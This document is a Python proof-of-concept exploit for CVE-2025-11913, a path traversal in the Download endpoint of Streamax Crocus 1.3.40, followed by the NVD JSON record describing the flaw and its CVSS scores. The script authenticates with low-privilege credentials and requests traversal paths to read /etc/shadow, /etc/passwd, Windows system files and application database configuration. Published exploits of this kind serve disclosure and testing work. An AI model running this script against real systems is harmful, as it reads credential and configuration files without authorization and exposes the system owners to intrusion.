CVE-2025-11913

# CVE-2025-11913 - Streamax Crocus Path Traversal PoC # Vulnerability: Path Traversal in Download function # Affected endpoint: /Service.do?Action=Download # Affected parameter: Path # Affected version: Streamax Crocus 1.3.40 import requests # Target configuration TARGET_URL = "http://target-host" LOGIN_URL = f"{TARGET_URL}/login.do" # Adjust login endpoint as needed DOWNLOAD_URL = f"{TARGET_URL}/Service.do?Action=Download" # Authentication credentials (low privilege account required) USERNAME = "low_priv_user" PASSWORD = "password123" # Create session to maintain cookies session = requests.Session() def authenticate(): """Authenticate with the target system using low privilege credentials""" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(LOGIN_URL, data=login_data) if response.status_code == 200: print("[+] Authentication successful") return True print("[-] Authentication failed") return False def exploit_path_traversal(target_file): """ Exploit path traversal vulnerability to read arbitrary files :param target_file: The file path to read (e.g., "../../../etc/passwd") """ # Construct malicious Path parameter with directory traversal payload = { "Path": target_file } response = session.get(DOWNLOAD_URL, params=payload) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Successfully read file: {target_file}") print(f"[+] File content:\n{response.text[:500]}") return response.text else: print(f"[-] Failed to read file: {target_file}") return None def main(): # Step 1: Authenticate if not authenticate(): return # Step 2: Exploit path traversal to read sensitive files # Linux/Unix targets target_files = [ "../../../etc/passwd", "../../../etc/shadow", "../../../etc/hosts", "../../../../../../etc/passwd", # Windows targets "..\\..\\..\\..\\windows\\win.ini", "..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts", # Application configuration files "../../../WEB-INF/web.xml", "../../../conf/database.properties", "../config/application.yml" ] for target_file in target_files: content = exploit_path_traversal(target_file) if content: break if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11913", "sourceIdentifier": "[email protected]", "published": "2025-10-17T20:15:38.290", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Shenzhen Ruiming Technology Streamax Crocus 1.3.40. Affected by this vulnerability is the function Download of the file /Service.do?Action=Download. Such manipulation of the argument Path leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:streamax:streamax_crocus:1.3.40:*:*:*:*:*:*:*", "matchCriteriaId": "9BE97623-A1D4-407D-88A8-8E204CFC39D2"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E6%B7%B1%E5%9C%B3%E5%B8%82%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AF%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8Crocus%E7%B3%BB%E7%BB%9F-6.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328923", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328923", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671480", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}